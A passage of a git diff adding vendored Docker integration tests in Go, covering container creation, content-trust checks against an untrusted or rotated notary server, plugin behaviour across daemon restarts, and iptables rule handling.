dockerCmd(c, "create", fmt.Sprintf("--ipc=container:%s", id), "busybox") +} + +func (s *DockerSuite) TestCreateByImageID(c *check.C) { + imageName := "testcreatebyimageid" + imageID, err := buildImage(imageName, + `FROM busybox + MAINTAINER dockerio`, + true) + if err != nil { + c.Fatal(err) + } + truncatedImageID := stringid.TruncateID(imageID) + + dockerCmd(c, "create", imageID) + dockerCmd(c, "create", truncatedImageID) + dockerCmd(c, "create", fmt.Sprintf("%s:%s", imageName, truncatedImageID)) + + // Ensure this fails + out, exit, _ := dockerCmdWithError("create", fmt.Sprintf("%s:%s", imageName, imageID)) + if exit == 0 { + c.Fatalf("expected non-zero exit code; received %d", exit) + } + + if expected := "Error parsing reference"; !strings.Contains(out, expected) { + c.Fatalf(`Expected %q in output; got: %s`, expected, out) + } + + out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", truncatedImageID)) + if exit == 0 { + c.Fatalf("expected non-zero exit code; received %d", exit) + } + + if expected := "Unable to find image"; !strings.Contains(out, expected) { + c.Fatalf(`Expected %q in output; got: %s`, expected, out) + } +} + +func (s *DockerTrustSuite) TestTrustedCreate(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-create") + + // Try create + createCmd := exec.Command(dockerBinary, "create", repoName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + dockerCmd(c, "rmi", repoName) + + // Try untrusted create to ensure we pushed the tag to the registry + createCmd = exec.Command(dockerBinary, "create", "--disable-content-trust=true", repoName) + s.trustedCmd(createCmd) + out, _, err = runCommandWithOutput(createCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create with --disable-content-trust:\n%s", out)) + +} + +func (s *DockerTrustSuite) TestUntrustedCreate(c *check.C) { + repoName := fmt.Sprintf("%v/dockercliuntrusted/createtest", privateRegistryURL) + withTagName := fmt.Sprintf("%s:latest", repoName) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", withTagName) + dockerCmd(c, "push", withTagName) + dockerCmd(c, "rmi", withTagName) + + // Try trusted create on untrusted tag + createCmd := exec.Command(dockerBinary, "create", withTagName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.Not(check.IsNil)) + c.Assert(string(out), checker.Contains, fmt.Sprintf("does not have trust data for %s", repoName), check.Commentf("Missing expected output on trusted create:\n%s", out)) + +} + +func (s *DockerTrustSuite) TestTrustedIsolatedCreate(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-isolated-create") + + // Try create + createCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated-create", "create", repoName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + dockerCmd(c, "rmi", repoName) +} + +func (s *DockerTrustSuite) TestCreateWhenCertExpired(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := s.setupTrustedImage(c, "trusted-create-expired") + + // Certificates have 10 years of expiration + elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try create + createCmd := exec.Command(dockerBinary, "create", repoName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.Not(check.IsNil)) + c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out)) + }) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try create + createCmd := exec.Command(dockerBinary, "create", "--disable-content-trust", repoName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.Not(check.IsNil)) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out)) + + }) +} + +func (s *DockerTrustSuite) TestTrustedCreateFromBadTrustServer(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclievilcreate/trusted:latest", privateRegistryURL) + evilLocalConfigDir, err := ioutil.TempDir("", "evilcreate-local-config-dir") + c.Assert(err, check.IsNil) + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + dockerCmd(c, "rmi", repoName) + + // Try create + createCmd := exec.Command(dockerBinary, "create", repoName) + s.trustedCmd(createCmd) + out, _, err = runCommandWithOutput(createCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + dockerCmd(c, "rmi", repoName) + + // Kill the notary server, start a new "evil" one. + s.not.Close() + s.not, err = newTestNotary(c) + c.Assert(err, check.IsNil) + + // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. + // tag an image and upload it to the private registry + dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) + + // Push up to the new server + pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + // Now, try creating with the original client from this new trust server. This should fail because the new root is invalid. + createCmd = exec.Command(dockerBinary, "create", repoName) + s.trustedCmd(createCmd) + out, _, err = runCommandWithOutput(createCmd) + if err == nil { + c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) + } + if !strings.Contains(out, "could not rotate trust to a new trusted root") { + c.Fatalf("Missing expected output on trusted create:\n%s", out) + } + +} + +func (s *DockerSuite) TestCreateStopSignal(c *check.C) { + name := "test_create_stop_signal" + dockerCmd(c, "create", "--name", name, "--stop-signal", "9", "busybox") + + res := inspectFieldJSON(c, name, "Config.StopSignal") + c.Assert(res, checker.Contains, "9") + +} + +func (s *DockerSuite) TestCreateWithWorkdir(c *check.C) { + name := "foo" + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + dir := prefix + slash + "home" + slash + "foo" + slash + "bar" + + dockerCmd(c, "create", "--name", name, "-w", dir, "busybox") + // Windows does not create the workdir until the container is started + if daemonPlatform == "windows" { + dockerCmd(c, "start", name) + } + dockerCmd(c, "cp", fmt.Sprintf("%s:%s", name, dir), prefix+slash+"tmp") +} + +func (s *DockerSuite) TestCreateWithInvalidLogOpts(c *check.C) { + name := "test-invalidate-log-opts" + out, _, err := dockerCmdWithError("create", "--name", name, "--log-opt", "invalid=true", "busybox") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unknown log opt") + + out, _ = dockerCmd(c, "ps", "-a") + c.Assert(out, checker.Not(checker.Contains), name) +} + +// #20972 +func (s *DockerSuite) TestCreate64ByteHexID(c *check.C) { + out := inspectField(c, "busybox", "Id") + imageID := strings.TrimPrefix(strings.TrimSpace(string(out)), "sha256:") + + dockerCmd(c, "create", imageID) +} + +// Test case for #23498 +func (s *DockerSuite) TestCreateUnsetEntrypoint(c *check.C) { + name := "test-entrypoint" + dockerfile := `FROM busybox +ADD entrypoint.sh /entrypoint.sh +RUN chmod 755 /entrypoint.sh +ENTRYPOINT ["/entrypoint.sh"] +CMD echo foobar` + + ctx, err := fakeContext(dockerfile, map[string]string{ + "entrypoint.sh": `#!/bin/sh +echo "I am an entrypoint" +exec "$@"`, + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "create", "--entrypoint=", name, "echo", "foo") + id := strings.TrimSpace(out) + c.Assert(id, check.Not(check.Equals), "") + out, _ = dockerCmd(c, "start", "-a", id) + c.Assert(strings.TrimSpace(out), check.Equals, "foo") +} + +// #22471 +func (s *DockerSuite) TestCreateStopTimeout(c *check.C) { + name1 := "test_create_stop_timeout_1" + dockerCmd(c, "create", "--name", name1, "--stop-timeout", "15", "busybox") + + res := inspectFieldJSON(c, name1, "Config.StopTimeout") + c.Assert(res, checker.Contains, "15") + + name2 := "test_create_stop_timeout_2" + dockerCmd(c, "create", "--name", name2, "busybox") + + res = inspectFieldJSON(c, name2, "Config.StopTimeout") + c.Assert(res, checker.Contains, "null") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go new file mode 100644 index 0000000000..f91edc6555 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go @@ -0,0 +1,317 @@ +// +build linux + +package main + +import ( + "os" + "os/exec" + "path/filepath" + "strings" + "syscall" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/mount" + "github.com/go-check/check" +) + +// TestDaemonRestartWithPluginEnabled tests state restore for an enabled plugin +func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) { + testRequires(c, IsAmd64, Network) + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + + defer func() { + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + + out, err := s.d.Cmd("plugin", "ls") + if err != nil { + c.Fatalf("Could not list plugins: %v %s", err, out) + } + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, "true") +} + +// TestDaemonRestartWithPluginDisabled tests state restore for a disabled plugin +func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) { + testRequires(c, IsAmd64, Network) + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName, "--disable"); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + + defer func() { + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + + out, err := s.d.Cmd("plugin", "ls") + if err != nil { + c.Fatalf("Could not list plugins: %v %s", err, out) + } + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, "false") +} + +// TestDaemonKillLiveRestoreWithPlugins SIGKILLs daemon started with --live-restore. +// Plugins should continue to run. +func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) { + testRequires(c, IsAmd64, Network) + + if err := s.d.Start("--live-restore"); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + defer func() { + if err := s.d.Restart("--live-restore"); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.Kill(); err != nil { + c.Fatalf("Could not kill daemon: %v", err) + } + + cmd := exec.Command("pgrep", "-f", pluginProcessName) + if out, ec, err := runCommandWithOutput(cmd); ec != 0 { + c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out) + } +} + +// TestDaemonShutdownLiveRestoreWithPlugins SIGTERMs daemon started with --live-restore. +// Plugins should continue to run. +func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C) { + testRequires(c, IsAmd64, Network) + + if err := s.d.Start("--live-restore"); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + defer func() { + if err := s.d.Restart("--live-restore"); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil { + c.Fatalf("Could not kill daemon: %v", err) + } + + cmd := exec.Command("pgrep", "-f", pluginProcessName) + if out, ec, err := runCommandWithOutput(cmd); ec != 0 { + c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out) + } +} + +// TestDaemonShutdownWithPlugins shuts down running plugins. +func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) { + testRequires(c, IsAmd64, Network, SameHostDaemon) + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + + defer func() { + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil { + c.Fatalf("Could not kill daemon: %v", err) + } + + for { + if err := syscall.Kill(s.d.cmd.Process.Pid, 0); err == syscall.ESRCH { + break + } + } + + cmd := exec.Command("pgrep", "-f", pluginProcessName) + if out, ec, err := runCommandWithOutput(cmd); ec != 1 { + c.Fatalf("Expected exit code '1', got %d err: %v output: %s ", ec, err, out) + } + + s.d.Start("--live-restore") + cmd = exec.Command("pgrep", "-f", pluginProcessName) + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +// TestVolumePlugin tests volume creation using a plugin. +func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) { + testRequires(c, IsAmd64, Network) + + volName := "plugin-volume" + destDir := "/tmp/data/" + destFile := "foo" + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + out, err := s.d.Cmd("plugin", "install", pName, "--grant-all-permissions") + if err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + pluginID, err := s.d.Cmd("plugin", "inspect", "-f", "{{.Id}}", pName) + pluginID = strings.TrimSpace(pluginID) + if err != nil { + c.Fatalf("Could not retrieve plugin ID: %v %s", err, pluginID) + } + mountpointPrefix := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs") + defer func() { + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + + exists, err := existsMountpointWithPrefix(mountpointPrefix) + c.Assert(err, checker.IsNil) + c.Assert(exists, checker.Equals, false) + + }() + + out, err = s.d.Cmd("volume", "create", "-d", pName, volName) + if err != nil { + c.Fatalf("Could not create volume: %v %s", err, out) + } + defer func() { + if out, err := s.d.Cmd("volume", "remove", volName); err != nil { + c.Fatalf("Could not remove volume: %v %s", err, out) + } + }() + + out, err = s.d.Cmd("volume", "ls") + if err != nil { + c.Fatalf("Could not list volume: %v %s", err, out) + } + c.Assert(out, checker.Contains, volName) + c.Assert(out, checker.Contains, pName) + + mountPoint, err := s.d.Cmd("volume", "inspect", volName, "--format", "{{.Mountpoint}}") + if err != nil { + c.Fatalf("Could not inspect volume: %v %s", err, mountPoint) + } + mountPoint = strings.TrimSpace(mountPoint) + + out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "touch", destDir+destFile) + c.Assert(err, checker.IsNil, check.Commentf(out)) + path := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs", mountPoint, destFile) + _, err = os.Lstat(path) + c.Assert(err, checker.IsNil) + + exists, err := existsMountpointWithPrefix(mountpointPrefix) + c.Assert(err, checker.IsNil) + c.Assert(exists, checker.Equals, true) +} + +func (s *DockerDaemonSuite) TestGraphdriverPlugin(c *check.C) { + testRequires(c, Network, IsAmd64, DaemonIsLinux, overlay2Supported, ExperimentalDaemon) + + s.d.Start() + + // install the plugin + plugin := "cpuguy83/docker-overlay2-graphdriver-plugin" + out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", plugin) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // restart the daemon with the plugin set as the storage driver + s.d.Restart("-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1") + + // run a container + out, err = s.d.Cmd("run", "--rm", "busybox", "true") // this will pull busybox using the plugin + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) { + testRequires(c, DaemonIsLinux, Network, IsAmd64) + + s.d.Start("--live-restore=true") + + out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, err = s.d.Cmd("volume", "create", "--driver", pName, "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + s.d.Restart("--live-restore=true") + + out, err = s.d.Cmd("plugin", "disable", pName) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "in use") + + out, err = s.d.Cmd("volume", "rm", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("plugin", "disable", pName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("plugin", "rm", pName) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) { + mounts, err := mount.GetMounts() + if err != nil { + return false, err + } + for _, mnt := range mounts { + if strings.HasPrefix(mnt.Mountpoint, mountpointPrefix) { + return true, nil + } + } + return false, nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go new file mode 100644 index 0000000000..3a74fe215f --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go @@ -0,0 +1,2988 @@ +// +build linux + +package main + +import ( + "bufio" + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "os" + "os/exec" + "path" + "path/filepath" + "regexp" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-units" + "github.com/docker/libnetwork/iptables" + "github.com/docker/libtrust" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// TestLegacyDaemonCommand test starting docker daemon using "deprecated" docker daemon +// command. Remove this test when we remove this. +func (s *DockerDaemonSuite) TestLegacyDaemonCommand(c *check.C) { + cmd := exec.Command(dockerBinary, "daemon", "--storage-driver=vfs", "--debug") + err := cmd.Start() + c.Assert(err, checker.IsNil, check.Commentf("could not start daemon using 'docker daemon'")) + + c.Assert(cmd.Process.Kill(), checker.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + if out, err := s.d.Cmd("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"); err != nil { + c.Fatalf("Could not run top1: err=%v\n%s", err, out) + } + // --restart=no by default + if out, err := s.d.Cmd("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"); err != nil { + c.Fatalf("Could not run top2: err=%v\n%s", err, out) + } + + testRun := func(m map[string]bool, prefix string) { + var format string + for cont, shouldRun := range m { + out, err := s.d.Cmd("ps") + if err != nil { + c.Fatalf("Could not run ps: err=%v\n%q", err, out) + } + if shouldRun { + format = "%scontainer %q is not running" + } else { + format = "%scontainer %q is running" + } + if shouldRun != strings.Contains(out, cont) { + c.Fatalf(format, prefix, cont) + } + } + } + + testRun(map[string]bool{"top1": true, "top2": true}, "") + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ") +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + + if out, err := s.d.Cmd("run", "--name", "volrestarttest1", "-v", "/foo", "busybox"); err != nil { + c.Fatal(err, out) + } + + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + if _, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil { + c.Fatal(err) + } + + if out, err := s.d.Cmd("rm", "-fv", "volrestarttest2"); err != nil { + c.Fatal(err, out) + } + + out, err := s.d.Cmd("inspect", "-f", "{{json .Mounts}}", "volrestarttest1") + c.Assert(err, check.IsNil) + + if _, err := inspectMountPointJSON(out, "/foo"); err != nil { + c.Fatalf("Expected volume to exist: /foo, error: %v\n", err) + } +} + +// #11008 +func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name", "top1", "--restart", "always", "busybox:latest", "top") + c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out)) + + out, err = s.d.Cmd("run", "-d", "--name", "top2", "--restart", "unless-stopped", "busybox:latest", "top") + c.Assert(err, check.IsNil, check.Commentf("run top2: %v", out)) + + testRun := func(m map[string]bool, prefix string) { + var format string + for name, shouldRun := range m { + out, err := s.d.Cmd("ps") + c.Assert(err, check.IsNil, check.Commentf("run ps: %v", out)) + if shouldRun { + format = "%scontainer %q is not running" + } else { + format = "%scontainer %q is running" + } + c.Assert(strings.Contains(out, name), check.Equals, shouldRun, check.Commentf(format, prefix, name)) + } + } + + // both running + testRun(map[string]bool{"top1": true, "top2": true}, "") + + out, err = s.d.Cmd("stop", "top1") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("stop", "top2") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // both stopped + testRun(map[string]bool{"top1": false, "top2": false}, "") + + err = s.d.Restart() + c.Assert(err, check.IsNil) + + // restart=always running + testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ") + + out, err = s.d.Cmd("start", "top2") + c.Assert(err, check.IsNil, check.Commentf("start top2: %v", out)) + + err = s.d.Restart() + c.Assert(err, check.IsNil) + + // both running + testRun(map[string]bool{"top1": true, "top2": true}, "After second daemon restart: ") + +} + +func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name", "test1", "--restart", "on-failure:3", "busybox:latest", "false") + c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out)) + + // wait test1 to stop + hostArgs := []string{"--host", s.d.sock()} + err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 10*time.Second, hostArgs...) + c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not")) + + // record last start time + out, err = s.d.Cmd("inspect", "-f={{.State.StartedAt}}", "test1") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + lastStartTime := out + + err = s.d.Restart() + c.Assert(err, check.IsNil) + + // test1 shouldn't restart at all + err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 0, hostArgs...) + c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not")) + + // make sure test1 isn't restarted when daemon restart + // if "StartAt" time updates, means test1 was once restarted. + out, err = s.d.Cmd("inspect", "-f={{.State.StartedAt}}", "test1") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + c.Assert(out, checker.Equals, lastStartTime, check.Commentf("test1 shouldn't start after daemon restarts")) +} + +func (s *DockerDaemonSuite) TestDaemonStartIptablesFalse(c *check.C) { + if err := s.d.Start("--iptables=false"); err != nil { + c.Fatalf("we should have been able to start the daemon with passing iptables=false: %v", err) + } +} + +// Make sure we cannot shrink base device at daemon restart. +func (s *DockerDaemonSuite) TestDaemonRestartWithInvalidBasesize(c *check.C) { + testRequires(c, Devicemapper) + c.Assert(s.d.Start(), check.IsNil) + + oldBasesizeBytes := s.d.getBaseDeviceSize(c) + var newBasesizeBytes int64 = 1073741824 //1GB in bytes + + if newBasesizeBytes < oldBasesizeBytes { + err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) + c.Assert(err, check.IsNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err)) + } + c.Assert(s.d.Stop(), check.IsNil) +} + +// Make sure we can grow base device at daemon restart. +func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) { + testRequires(c, Devicemapper) + c.Assert(s.d.Start(), check.IsNil) + + oldBasesizeBytes := s.d.getBaseDeviceSize(c) + + var newBasesizeBytes int64 = 53687091200 //50GB in bytes + + if newBasesizeBytes < oldBasesizeBytes { + c.Skip(fmt.Sprintf("New base device size (%v) must be greater than (%s)", units.HumanSize(float64(newBasesizeBytes)), units.HumanSize(float64(oldBasesizeBytes)))) + } + + err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) + c.Assert(err, check.IsNil, check.Commentf("we should have been able to start the daemon with increased base device size: %v", err)) + + basesizeAfterRestart := s.d.getBaseDeviceSize(c) + newBasesize, err := convertBasesize(newBasesizeBytes) + c.Assert(err, check.IsNil, check.Commentf("Error in converting base device size: %v", err)) + c.Assert(newBasesize, check.Equals, basesizeAfterRestart, check.Commentf("Basesize passed is not equal to Basesize set")) + c.Assert(s.d.Stop(), check.IsNil) +} + +// Issue #8444: If docker0 bridge is modified (intentionally or unintentionally) and +// no longer has an IP associated, we should gracefully handle that case and associate +// an IP with it rather than fail daemon start +func (s *DockerDaemonSuite) TestDaemonStartBridgeWithoutIPAssociation(c *check.C) { + // rather than depending on brctl commands to verify docker0 is created and up + // let's start the daemon and stop it, and then make a modification to run the + // actual test + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + if err := s.d.Stop(); err != nil { + c.Fatalf("Could not stop daemon: %v", err) + } + + // now we will remove the ip from docker0 and then try starting the daemon + ipCmd := exec.Command("ip", "addr", "flush", "dev", "docker0") + stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd) + if err != nil { + c.Fatalf("failed to remove docker0 IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr) + } + + if err := s.d.Start(); err != nil { + warning := "**WARNING: Docker bridge network in bad state--delete docker0 bridge interface to fix" + c.Fatalf("Could not start daemon when docker0 has no IP address: %v\n%s", err, warning) + } +} + +func (s *DockerDaemonSuite) TestDaemonIptablesClean(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + if out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top"); err != nil { + c.Fatalf("Could not run top: %s, %v", out, err) + } + + // get output from iptables with container running + ipTablesSearchString := "tcp dpt:80" + ipTablesCmd := exec.Command("iptables", "-nvL") + out, _, err := runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + + if !strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out) + } + + if err := s.d.Stop(); err != nil { + c.Fatalf("Could not stop daemon: %v", err) + } + + // get output from iptables after restart + ipTablesCmd = exec.Command("iptables", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + + if strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, out) + } +} + +func (s *DockerDaemonSuite) TestDaemonIptablesCreate(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + if out, err := s.d.Cmd("run", "-d", "--name", "top", "--restart=always", "-p", "80", "busybox:latest", "top"); err != nil { + c.Fatalf("Could not run top: %s, %v", out, err) + } + + // get output from iptables with container running + ipTablesSearchString := "tcp dpt:80" + ipTablesCmd := exec.Command("iptables", "-nvL") + out, _, err := runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + + if !strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out) + } + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + + // make sure the container 